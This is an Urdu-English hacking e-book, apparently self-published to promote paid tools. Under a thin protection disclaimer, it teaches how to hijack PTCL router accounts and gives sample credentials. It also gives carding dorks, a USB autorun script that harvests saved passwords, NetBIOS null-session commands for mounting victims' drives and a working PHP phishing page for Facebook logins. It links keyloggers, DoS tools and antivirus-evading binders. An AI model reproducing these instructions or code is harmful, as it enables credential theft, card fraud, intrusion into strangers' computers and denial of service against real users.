Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree
ASSALAMUALAIKUM Introduction:-Ya kataab hacking ma mufeed tareen katab ha ore advance tareen book ha. Ya book 2015速 ma shaya hoi ha. Is ma takriban urdu zuban ziada istamal hoi ha. Is book ma 34576+ books ke madad sa banayi gai ha. Ya tarika kar takreeban har window par kargar han(win7,win8,vina,vista,xp). Ya book par kar hacking sa bacha ja sakta ha ore apni protection ke ja sakti ha jo har aik ka liya mufeed ha. Is ko sirf apni ore mulak ke protection ka liya he use karien ore apna dafa karien. Issa hargiz negative tor par istamal na karien.is ma kafi sites sa be help la kar be banay giya ha like(Wikipedia,wikihow,ceh)etc. ya katab Pakistan ma abi sab sa bari hacking book ore complete knownledge is ma majood ha jo urdu ore English dono zubano ma ha.ok let start hacking.
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 1
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree
mtahirzahid.blogspot.com Hack Tutrial part1
requirements:1) router 2) ptcl connection 3) wo kam az kum us par aik martaba net ptcl ka chala ho ptcl number par 4) user name and password list of ptcl users
----------------------------sab sa pahla ap 192.168.1.1 par jan.
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 2
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree Is ka bad ya step ha ka advance setup click karien
Is ka bad edit par click karien.
Is ka bad username and password enter karen
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 3
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree
Is ka bad next click karien
Is ka bad apply per click karien
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 4
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree
Username demo=http://www.4shared.com/office/mosQW__Tce/ptcl_tahir_user_demo.html or http://www.4shared.com/office/mosQW__Tce/ptcl_tahir_user_demo.html Pro username and password rupees is 111$ ore is ka sath ptcl ki sites ka passwords or username ore password verifier be gis ka sat ap net ke speed ore us ke mukamil tafseel dakh sakta han. Download link pro custumers http://www.4shared.com/zip/AKdK6LCqba/dsl_info_pass_2015_tahir_publi.html password on demand id=mtahirzahid@yahoo.com Sample:-
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 5
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree
Example:user=0526615077 pass=ptcl -----------------ip=http://39.45.155.233/ user=03026464086a pass=ptcl Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 6
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 7
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree
Hack Tutrial part2 Hack ptcl router password tool:-
Sub sa pahlay ap software download Karen. Is ka bad ap isy extract Karen. Password is ka tahir ha Is ka bad install Karen ore jis sa ap na net liya ha us ka password is ka zariya talash Karen. Ip ma 192.168.1.1 ya jo router da default ip ha. Ore custom dictionary attack be kar sakta ha Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 8
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree Ya pir ap wo wali dictionary be use kar sakta han jo is ke apne ha. Download link(password=tahir) http://www.4shared.com/zip/ex66DAtDba/tz_RouterPasswordKracker.html Hack Tutrial3:-
Is software ka zariya ap computer ma sa router ka password descrypt kar sakta han jo router ka password show kar da ga. Ya password browser (firefox,operamini,firezilla,mozillafirefox,safari,internetexplorer) ya chaha koi be ho password extract ya descript kar ka show kar dag a. Us ka zariya ap router ke setting ma ja sakta han. Download link:http://www.4shared.com/zip/ux8hiRgOba/tz_RouterPasswordDecryptor.html Hack Tutrial4:Ptcl hack ka mutalik mufid books Download Link:1-) http://www.4shared.com/rar/TKatnR5X/ADSL_Router.html
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 9
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree 2-) http://www.4shared.com/document/G7-M8_S9/Initial_router_configuration.html 3-) http://www.4shared.com/document/XrujtLvt/Examine_the_Router.html 4-) http://www.4shared.com/document/A_T5MRb4/Telnet_to_a_remote_Router.html 5-) http://www.4shared.com/file/RUMFNJe4/backup_router.html 6-) http://www.4shared.com/office/USxG9Jty/Hacking_Routers_-_FREE_ADSL.html Hack Tutrial:[ CARDING DORK ] Dork : intext:exp: | expired: credit card number: cvv: ext:txt 2018 Dork : intext:exp: | expired: credit card number: cvv: ext:txt 2017 Dork : intext:exp: | expired: credit card number: cvv: ext:txt 2016 Dork : intext:exp: | expired: credit card number: cvv: ext:txt 2015 Dork : intext:exp: | expired: credit card number: cvv: ext:txt 2014 Dork : intext:exp: | expired: credit card number: cvv: ext:txt 2013 Chek Valid : http://creditcardity.com/
Hack Tutrial5:Is tarika kar ka zariya sa ap kisi ka be username ore password talash kar sakta ha. Sab sa pahla ip scanner download Karen. Download link:http://www.4shared.com/zip/n137AgbCce/1-SuperScan_4.html ya ya wala download link sa download Karen. http://www.4shared.com/zip/xWFuzm37ce/Angry_IP_Scanner_v208.html
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 10
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree
Port seeting ma ja kar 80 ore 8080 raken. Or jo live ip hon wo ussey browser ma ja kar type Karen ore default user ore password type Karen. admin (none) Admin(admin) User(user) adm (none) Admin/ comcomcom Support/support Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 11
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree Ap iss angry ip scanner ma apna ip jo net sa find kia ha Farz kia ap apna ip find karne ka liya www.findmyipaddress.com Ma ga ore wahan par ap ka ip ya show ho raha ha 112.168.1.1 to ap yahan sa la kar 112.168.1.225 tak ip daken ka kon sa is wakat on ore kon sa off ha. On ip ka user password hasil kar ka app us ka net off kar ka apna chala sakta han. Default user ore password in sites sa find kar sakta han. http://www.routerpasswords.com/ http://portforward.com/networking/forgot-router-password.htm http://portforward.com/networking/forgot-router-password.htm
Hack Tutrial 6:Kis tarah router ka password remove kia jata ha
Jo chotta sa sorakh router ka iss point par hota ha iss ma kisi soi ya barikh cheez sa dabai rakan thori dar ma router reset ho jai ga ore us ma default user name ore password enter Karen Jasa ka user/user admin/admin telnet/telnet ptcl/ptcl wagara
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 12
Power Of Hacking® Facebook:https://www.facebook.com/HAckingRouterwifiFree Hack Tutrial 7:Kis tarah kisi ka be online username ore password hack ya crack kia jata ha Sab sa pahlay ap iss sites sa software download Karen. www.darknet.org.uk/content/files/brutus-aet2-darknet.zip
brutus-aet2.zip here (the password is darknet123)
Ap jis ip ka password ore user crack ore online hack karna chatay han ap us ka ip uss target box ma type karen. Ap apni marzi sa dictionary ,brutus ya kisi be tarah sa attack kar sakta han. Brutus force attack ka Features :
HTTP (Basic Authentication) HTTP (HTML Form/CGI) POP3 FTP SMB Telnet
Hack Tuturial 8:Spy ore keylogger software ka zariya sa be passwords hack kar sakta han http://www.4shared.com/zip/hw2SHB9Tce/007_spy_soft_3874_Tahir.html
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 13
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree
Ya software register ha ore crack be. High level software net ka mukabla buhut kam kimat ma 17+ software sirf 19$ Ma life time gurantee ka sath la sakta han jo bbc news wagara ka istamal ma a chukka han ore
totally undetectable
han.
Hack Tuturial 9:Phishing ore social engenering ka zariya sa be ap password hack kar sakta han. Example of phishing Likebot.fulba.com Iss site ka zariya sa kisi ka be password hack kar sakta han
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 14
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree
Iss tarika sa ap router ka be fake page bana kar user name ore password hack kar sakta han. Ya software ap ke help kara ga phishing ma http://www.4shared.com/rar/EGlluhgRba/Phish_create_V2.html http://www.4shared.com/rar/KpOFJ2nFce/SUPERPHISHER_hackingguide_.html messenger ka zaiya phishing jasa ka
http://www.4shared.com/file/ErMpCFaq/Yahoo_Messenger_Tahir.html
Hack Tuturial10:Kis tarika ka zariya ap ptcl ke site down kar sakta ha
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 15
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree
Download link:http://www.4shared.com/zip/QDR5ZodJce/DoSTool.html http://www.4shared.com/zip/6V5XysrCba/DoS_Attacker.html http://www.4shared.com/zip/VEM4J9cpce/FreeSite_Killer_201.html http://www.4shared.com/zip/QUXulak5ba/Site_NuKe.html
http://www.4shared.com/zip/8hwzrjRkba/Web_Attacker_ENG.html http://www.4shared.com/zip/guhCK1Bpba/wwh_flooder_20.html Hack Tutrial11:Kis tarika sa kisi ka net off kia ja sakta ore apney net ke speed full high ke ja sakte ha Sab sa pahlay ya software download Karen Ya android mobiles ka liya ha http://www.4shared.com/rar/Sf7pI-OEba/WKwifikill_v21__AXA.html iss software ko pahlay net ma download Karen ore unzip kar ka phir mobile ma copy kar ka install Karen.
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 16
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree
Agar ap net sa connect han wifi ka zariya sa to kisi ka be lan ma jo net sa connect ha router ka zariya sa us ka net off kar sakta han. Pc yani computer ya leptop ka liya ya link sa software download Karen http://www.4shared.com/zip/kBCHyf0hba/netcut_alreadyinstall_win7__al.html
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 17
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree
Ap cutoff ka zariya sa kisi ka be net off kar sakta han ore resume ka zariya sa dubara be chala sakta han. Iss sa bachnay ka liya ka koi ap ka net off kara side par netcutt protector ha click kar ka online install be kar saktan han. Is sa ap is ka hamla sa mafooz ho sakta han.
Hack Tutrial12:Router ka password ore username talash karna ka tarika
www.nirsoft.net/toolsdownload/routerpassview.zip Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 18
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree iss site sa ya software download Karen ore password ore username recover kar laien. Iss software ka zariya app inn router ka password to confirm recover kar sakta han.Linksys WRT54GL (With original firmware or Tomato firmware), WRT54G (only some of them), WRT160N, WRT320N, and possibly similar models. Linksys E5200 Linksys E2000 Linksys RV082 Linksys E2500 Linksys N1500 Linksys E900 Cisco-Linksys E4200Edimax BR6204WG, and possibly similar models. Siemens ADSL SL2-141, and possibly similar models. Dynalink RTA1025W, and possibly similar models. NETGEAR WGT624, WGR614v9, WNR1000v3, WNR3500L, and possibly other models. ASUS WL-520g, WL-600g, and possibly similar models. ASUS RT-N10+ , and possibly similar models. Asus RT-N56U , and possibly similar models. Asus RT-AC66U D-Link DIR-655, DIR-300, and possibly similar models. Sanex SA 5100, and possibly similar models. Sitecom WL-351, WL-575, WL-312, and possibly similar models. COMTREND 536+ (Only Internet Login) US Robotics 9108 ADSL (internet login and admin login) D-Link DSL-2540U/BRU/D ADSL2+, DSL-2650U, DSL-520B D-Link DVA-G3170i/PT D-Link DSL-604T D-Link G3670B DLink DSL-2640T D-Link DSL-G684T D-Link DSL-2500U D-Link 2740BD-Link DIR-615 G2 DLink WBR-1310 D-Link DSL-2543B D-Link DI-524 D-Link DI-624+A D-Link DIR-600 D-Link DIR-300 D-Link DSL-2780 TL-WDR4300 N750 TP-Link TD-8810 ADSL Modem/Router. Dynamode R-ADSL-C4-W-G1 NetComm NB5Plus4 DSL Thomson TG580 DSL (only in Hex Dump mode) Asus RT-G31 HuaWei EchoLife HG520 (Only some of them) HuaWei HG526 HuaWei-3Com Aolynk BR104 TP-LINK TL-WR841N TP-LINK TL-WR841DN TP-LINK TL-MR342 TP-LINK TL-WR340G TP-LINK TL-R460 TP-LINK TL-WR741ND v2.0 TP-LINK TL-WR700N TP-LINK TL-WR740N TP-LINK TL-WA801N TP-LINK TL-WR541G TP-LINK TL-WR1043ND TP-LINK TD-W8960N TP-Link TL-WR941ND TP-Link TL-MR3220 TP-Link TL-WR642G TP-Link TLWDR3320 TP-Link TL-WDR3600 TP-Link TD-W8970 Belkin N+ (F5D8236uk4) Mercury MW54R Netgear DG632 Netgear Wireless Cable Voice Gateway CG3000/CG3100 Netcomm NB6W Aztech DSL605EW Comtrend CT-5072T ADSL2+ modem/router Small Business RV042 Intelbras WRN240 ipTIME N604V Linksys WRV200 ore ajkal ka advance router jo ptcl ka a raha han.
Note:-
Jis user name sa ap net chalian ga wo of ho jai ga us ka net jab tak ap chalian ga . Ap asa users lian jo 12 baja ka bad off hon jain jasa ka govtment school ,bank wagara.
Contact:mtahirzahid@yahoo.com Skype:wxyz_786
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 19
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree Facebook page: https://www.facebook.com/HAckingRouterwifiFree Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com
Hack Tutrial:Premium Links Generate karene wali sites
Inn sites ke madad sa ap premium links generate kar sakta han. Hack Tutrial:Hack Karen rapzo keylogger ka zarieya sa
download link:http://www.4shared.com/rar/8YvkwGi7ce/RapZoLoggerv15PublicEdition.html Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 20
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree orhttp://adf.ly/jMJHorhttp://downloads.ziddu.com/download/14025581/RapZoLogger v1.5PublicEdition.rar.html/engSab sa pahlay ap enable button ko click Karen us ka bad ap username ore password jo ap ka ha wo enter Karen us ka bad ap wo id type Karen jis ka zariya sa email pa ap computer log (passwords) wasool Karen ga. Ore us ka bad ap testme par click Karen.
ore us ka bad ap na built button par click kar deyna ha ore us file ko jo built ke ha file ko winzip ya winrar ma compress kar ka kisi ko be mail kar daney ha ore us ka computer sa online passwords hack ho ka maloom kar sakta han. Hack Tutrial:Kis tareka sa kisi ka passwords hack kia ja sakta ha usb ka zariya sa Is site par ja kar ya software download Karen http://www.nirsoft.net/ is ka bad ap in software ko usb extract kar ka hidden kar den is ka bad ap notepad new open kar ka ya type Karen start mspass.exe /stext mspass.txt start mailpv.exe /stext mailpv.txt start iepv.exe /stext iepv.txt start pspv.exe /stext pspv.txt start PasswordFox.exe /stext passwordfox.txt start OperaPassView.exe /stext OperaPassView.txt start ChromePass.exe /stext ChromePass.txt start Dialupass.exe /stext Dialupass.txt start netpass.exe /stext netpass.txt Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 21
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree start WirelessKeyView.exe /stext WirelessKeyView.txt start BulletsPassView.exe /stext BulletsPassView.txt start VNCPassView.exe /stext VNCPassView.txt start OpenedFilesView.exe /stext OpenedFilesView.txt start ProduKey.exe /stext ProduKey.txt start USBDeview.exe /stext USBDeview.txt ore is ka bad saveas usb ma tahir.bat ka name sa kar den. Is ka bad aik ore new notepad open kar ka ya type Karen [autorun] open=tahir.bat ACTION= Play Game Issya AUTORUN.inf ka name sa save kar den.
Hack Tutrial:Proagent spy + keylogger softwares ka zariya sa computer ke sari information hack karnya ka tarika Downloadlink:- http://www.4shared.com/rar/g9UTldkOce/00spyproagent_Tahir.html
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 22
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree
Ap sirf in software ma apni email ore passwords enter Karen ore test kar ka is ka bad built kar ka isya apna dushman computer par mail ya copy kar den. Is ka bad online mukamil malumat read Karen. Is ka zariya sa ap kisi ka email ore atm creditcard wagara ke malumat be hack kar sakta han. Iss link ma sirf aik software he nahi ha balka is ma almost 10+ hacking tools ore crack han.ore registration serial be andar he majood ha.
Hack Tutrial:Pdf ka password remove Karen ka tarika Ya link sa software download Karen:- http://www.4shared.com/zip/QgI4RtqWba/3PDF_Password_Remover_v22.html Is ka bad iss software ko install Karen ore finish honey ka bad jo file ka password crack karna ha wo file ko open button ka zariya sa click kar ka password crack Karen.
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 23
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree
Hack Tutrial:Kis tarika sa ap kisi ka password ore computer ke registry be hack kar sakta han
Is link sa software download Karen:http://www.4shared.com/zip/p74fOxVVba/541_keylogger.html ore latest version ya ha http://www.4shared.com/zip/JVhDFfvnce/541sKeyloggerv701_by_Tahir_per.html
is software ma apni email ore passwords enter kar ka ore apni marzi sa koi be option enable ya disable kar sakta han. Hack Tutrial:Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 24
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree Kis tarika sa ap koi be howai ke device unlock kar sakta han Download link:http://www.4shared.com/zip/nHpTwobBce/DC_Unlocker_Cracked_Version.html Supported models jo read bootloader code kar sakta ha: Huawei Ascend G300Huawei Ascend G330Huawei Ascend G330DHuawei Ascend G600Huawei Ascend G600DHuawei U8815Huawei U8815NHuawei U8825Huawei U8825D Huawei U8950Huawei U8950-51Huawei U8950DHuawei U8950NHuawei U8950N-51Huawei Ascend G510-0100Huawei Ascend G510-0200Huawei Ascend G510-0251 Huawei Ascend Y300-0100Huawei Ascend Y300-0151Huawei ValiantOrange Daytona Is link sa hawai ka drivers install karien:- https://files.dcunlocker.com/backend/r.php/public/EF65FFC8D36E40118BE98BC29A9C1216 In drivers ko extract kar ka install kar ka launch karien. WARNING: ya sirf ore sirf procedure ko yani ap ka mobile ko computer sa connect ka liya he han.
drivers ko install kar ka computer ko restart kar dein.
Ya zarrori step ha.
. Is ka bad mobile ko turn off kar den
Is ka bad Press "Volume down", "Volume up" ore "Power" buttons.
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 25
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree Ya sirf 5 sec ka liya hi press Karen ga.device ko usb cable ka zariya sa computer ka sath
connect karien.
device ko detect honey den.
is ka bad dc unlocker software ko open Karen ore
is ka
bad intazar Karen device koconnect hona ka is ka bad ya software download karein. https://files.dcunlocker.com/backend/r.php/public/7BC60AE8B0F84F39ABE813F978562B3C
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 26
Power Of Hacking® Facebook:https://www.facebook.com/HAckingRouterwifiFree Is software ko install Karen.
Turn off phone. Press ore hold karein Vol- ore Power buttons enter karein fastboot mode
Connect phone karien usb cable ka zariya sa Click karien“windows” + “R” button, type karien “cmd” ore phir click “OK”, command
window zahar ho jai ge.
Type in unlocking command - fastboot oem unlock password, jasa ka masal ka tor par, fastboot oem unlock 1531461291861883
is ka Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 27
Power Of Hacking® Facebook:https://www.facebook.com/HAckingRouterwifiFree bad device ko restart kar dein ore sets to standby mode kar dien.
Hack Tutrial:Netbios hacking ka zaryia sa computer hack karein ka tarika Sab sa pahlay angry ip scanner download karien Ap ko is ka bad target ip range ka pata hona chaiya jis network ka computer hack karna chatay han Start button par ja kar run par ja kar “cmd” type karien is ka bad ip config type karien
is ka bad jo ip ap ka ha wo angry ip scanner ma to ma likhan farz kia ap ka ip 192.168.1.1 show howa ha to ap from ma 192.168.1.255 type karein ore live ip note kar lien jisa hack karna ha.ore angry scanner ke port 139 set karne ha.
is ka bad cmd ma ja kar ya cmd type karien net view \\10.0.2.19 agar koi error show na ho to disk drive ore printer hack kar sakta han. Iss ka bad ya cmd type karien net use D: \\10.0.2.19\F net use G: \\10.0.2.19\SharedDocs net use I: \\10.0.2.19\Myprint NOTE:jo example ma D:,G: & I: yaw o network drives names han jo ap create kartey han apna computer ma harddisk ko access karney ka. Note:jo drive name wo ap ka computer ma pahlay san a majod ho koi be harddisk,floppy ore rom drives wagara C: & D: hard disk,A: floppy ore E: cd-drive, F:istamal karein shared drive ka tor par cmd prmpt ma Note:agar firewall enable ha computer ka to ap kamyab nahi ho sakta. Ya cmd example ka tor par zaid information ka liya han
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 28
Power Of Hacking® Facebook:https://www.facebook.com/HAckingRouterwifiFree Syntax: C:\>nbtstat –n Syntax: C:\>net view \\192.168.110.29 Syntax: C:\>net use E: \\192.168.110.29\C Syntax: C:\>net use F: \\192.168.110.29\Myprint Syntax: C:\>net use G:
\\192.168.110.29\SharedDocs
aik ore example: C:\>nbtstat -A 192.168.1.11 NetBIOS Remote Machine Name Table Name Type Status --------------------------------------------TECHTRIGGER <00> UNIQUE Registered TT LABS <00> GROUP Registered TECHTRIGGER <03> UNIQUE Registered TECHTRIGGER <20> UNIQUE Registered TT LABS <1E> GROUP Registered MAC Address = 44-45-53-54-00-00
C:\>net view \\192.168.1.11 Shared resources at \\192.168.1.11 Sharename Type Comment ----------------------------------------------------------------C Disk Drive C:\ Videos Disk My collection of Hacking videos The command was completed successfully.
C:\>net use G: \\192.168.1.11\C The command was completed successfully. C:\>G: G:\>
c:\>net use \\[ip address of target machine]\ipc$ "" /user:""
c:\>net view \\[ip address of remote machine]
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 29
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree C:\>net view \.0.0.0 System error 5 has occurred. Access is denied. C:\>net use \.0.0.0\ipc$ "" /user:"" The command completed successfully. C:\>net view \.0.0.0 Shared resources at \.0.0.0 Share name
Type
Used as
Comment
-------------------------------------------------------------------Accelerator Disk Agent Accelerator share for Seagate backup Inetpub Disk mirc Disk NETLOGON Disk Logon server share www_pages Disk The command completed successfully.
alive or dead Example : C:\>ping 192.168.1.11 Pinging 192.168.1.11 with 32 bytes of data: Reply from 192.168.1.11: bytes=32 time=4ms TTL=64 Reply from 192.168.1.11: bytes=32 time=1ms TTL=64 Reply from 192.168.1.11: bytes=32 time=1ms TTL=64 Reply from 192.168.1.11: bytes=32 time=1ms TTL=64 Ping statistics for 192.168.1.11: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 1ms, Maximum = 4ms, Average = 1ms
Disadvantages : NetBios hacking fails when 1)Remote system is fully patched . 2)Not applicable in Vista/win 7. 3)Remote system has Admin password . Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 30
Power Of Hacking® Facebook:https://www.facebook.com/HAckingRouterwifiFree 4)Firewall enabled
Hack Tutrial:Phishing ka zariya sa kisi ka be account facebook,youtube,dailymotion atm creditcard hack karnye ka tarika Step1:sab sa pahlay ap phishing.php notepad ma saveas karein ore notepad ma ya type karien: <html> <body> <?php $handle = fopen("password.txt", "a"); fwrite($handle,$_POST["email"]); fwrite($handle,"\n"); fwrite($handle,$_POST["pass"]); fwrite($handle,"\n"); fwrite($handle,"\n"); fclose($handle); header("Location: https://www.facebook.com/login.php?login_attempt=1"); exit; ?> </body></html> Step2:is ka bad facebook on karien ore is page ko saveas desktop par kar lien. Is ka bad index.html ko open karien ore search karien action= ore us ka andar ka code change kar
dien. phishing.php”
is ka bad ya code type karien “
Step3:is ka bad blank notepad ka name password.txt rakh dien. ap ka phishing page tayar ho chukka ha. Step4:is ka bad issa kisi be free hosting site par host kar dien ore phishing link target computer ko email ya sms karien jab wo site ma enter ho ga ap us ka password
yoursite.com/password.txt ma dakh sakta han.
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 31
Power Of Hacking® Facebook:https://www.facebook.com/HAckingRouterwifiFree
Ap software ka zariya sa be phishing kar saktay han. “Super Phisher1.0” google sa
download karien Downloadhere: http://www.ziddu.com/download/6966159/SUPERPHISHER.rar.html P assword: hackingguide url page ma wo site type karien jis page sa phishing tayar karne ha log file ma wo name type karien jis sa ap passwords vasool kar sakan/ name of php default he rahnay den. Site to redirect to ma wo site type karien jo fake login ka bad appear ho. Ap phisher creator2 ka zariya sa be phishing page create kar sakta han.
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 32
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree
is ka tarika kar be taqreeban same ha ore ya pahlay tool sa best ha. Downloadhere: http://www.ziddu.com/download/6966161/PhishcreateV2.rar.html Pas sword: hackingguide 34phishing pack page is ma han Download here:http://www.mediafire.com/download.php?yzm3k1mojhu Hack Tutrial:Firesheep ka zariya sa facebook youtube accounts hack karnien ka tarikaIs method se facebook account hack kar sakte hain.per is se ap sirf kisi dosre ki id use kar sakte or edit kar sakte hain ap us ka pswd change nahin kar sakte.1.Sub se pehle koi update mozilla firefox install karen.2.Is Below Icon and Download 'winpcap' free install karen.iss ka bad wincap download karien http://adf.ly/2kuGW 3.Ab nechey icon per click karen or free firesheep software install Karen http://adf.ly/2kuHl 4.Ab mozilla fire fox open karen or file per click karen 'open file' per click karen.5. Ab firesheep per click kar ke select karen. 6.Agar install ho jaye to thek warna koi or mozilla version install karen. for xmple mozilla portable install karen ya koi or.7. Jub file install ho aye to mozilla ko restart karen.8.Phir mozilla open karen or view main jayen or side bar per lik karen.9.Ab yahan per firesheep ho ga us per click karen.10.Side per firesheep a jaye ga.ab capture per click karen.ab jis jis ne bhi facebuk login ki ho gi wo sub aik list ban kar side main a jaye gi.phir ap jis ki chahe id per click kar ke usey use karen.*Or yeh method is tarah amal karey ga ke ap kisi net cafe per hain or kisi or ne facebuk per apna acount open kar rakha hai to ap usi wqt yeh method use karen to ap us ki id use kar saken gen ya ap ne apne dsl wagaira ki cable kisi ke sath share kar rakhi hai jub wo login ho ga ap yeh method laga den to phir ap use kar saken gen.ok
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 33
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree
Hack Tutrial:-
Keylooger ka mutalik mufid information Keylogger 1 S0ftware H0ta H Ese Ziada Tar Email IDs Hack Krne K Lye Use Kiya Jata H, Keylogger Se Ham 1 file Bnate H Aur W0 file Apne victum K0 Bhejte H Jb W0 Es File K0 Run Kre Ga To, W0 file 0s k Computer Me Install H0 jaye Ge, Es K Bad Jb Apka victum k0i Kam Bhe Kre Ga To Apk0 via Email Pata Chalta Rhay Ga K Apka Victum Kiya Kr Rha H, Har 5 Mints K Bad 0s k Har kam ke Report Apk0 Ap k Email pe Mil Jaye Ga Aur Ye Tab Tak Hota Rhay Ga Jb Tak Apka Victum Window fresh nHi Kr Lita. Asal me Keylogger Jo File Bnata H 0s file me 1 virus(Trojan) h0ta H, Jb Ap File Bna kr Victum K0 Dite h0 aur w0 Es pe Click kr lita h to ye virus 0s k PC me Install Ho Jata H Agay Apk0 Bta dia H k phir kiya H0 Ga.. Keylogger k Virus PC K Lye Harmful nHai H0te P2: Es me Maze Ke Baat Ye H k Ap Keyl0gger file K0 Image,S0ng,S0ftware ke Shakal De Sakte Ho Keylogger File K0 Image,s0ng ke Shakal Dane k Lye Binder Naam ka S0ftware Use H0ta H, Binder Kafi Qisam k H0te h par Unka Kam same he H0ta H0 k0i 1 Net Se D0wnload kr le Agar Ap Ye file victum K0 Ditay Ho Aur Agr 0s k PC Me Antivirus Install Howa To 0ska Antivirus Ap ke Keylogger file k0 Detact Kr De Ga, Jiski Wja Se victum File K0 Run nHai Kre Ga
